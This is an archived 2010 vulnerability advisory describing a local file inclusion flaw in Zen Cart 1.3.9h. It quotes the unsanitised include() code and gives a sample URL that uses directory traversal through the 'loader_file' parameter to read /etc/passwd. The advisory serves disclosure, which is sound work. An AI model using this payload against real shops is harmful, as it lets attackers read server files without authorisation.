Zen Cart 1.3.9h Local File Inclusion Vulnerability

2010-11-04T00:00:00
ID SECURITYVULNS:DOC:25087
Type securityvulns
Reporter Securityvulns
Modified 2010-11-04T00:00:00

Description

Zen Cart 1.3.9h Local File Inclusion Vulnerability

Name Zen Cart Vendor http://www.zen-cart.com Versions Affected 1.3.9h

Author Salvatore Fresta aka Drosophila Website http://www.salvatorefresta.net Contact salvatorefresta [at] gmail [dot] com Date 2010-11-03

X. INDEX

I. ABOUT THE APPLICATION II. DESCRIPTION III. ANALYSIS IV. SAMPLE CODE V. FIX

I. ABOUT THE APPLICATION


Zen Cart truly is the art of e-commerce; free, user-friendly, open source shopping cart software. The ecommerce web site design program is being developed by a group of like-minded shop owners, programmers, designers, and consultants that think ecommerce web design could be and should be done differently.

II. DESCRIPTION


A parameter is not properly sanitised before being used by the include() PHP's function.

III. ANALYSIS


Summary:

A) Local File Inclusion

A) Local File Inclusion


Input passed to the "loader_file" parameter in includes/initsystem.php is not properly verified before being used to include files. This can be exploited to include arbitrary files from local resources via directory traversal attacks.

Successful exploitation requires that register_globals is set to On.

The following is the vulnerable code:

<?php

$base_dir = DIR_WS_INCLUDES . 'auto_loaders/'; if (file_exists(DIR_WS_INCLUDES . 'auto_loaders/overrides/' . $loader_file)) { $base_dir = DIR_WS_INCLUDES . 'auto_loaders/overrides/'; }

include($base_dir . $loader_file);

IV. SAMPLE CODE


A) Local File Inclusion

http://site/path/includes/initsystem.php?loader_file=../../../../../../../../etc/passwd

V. FIX


No fix.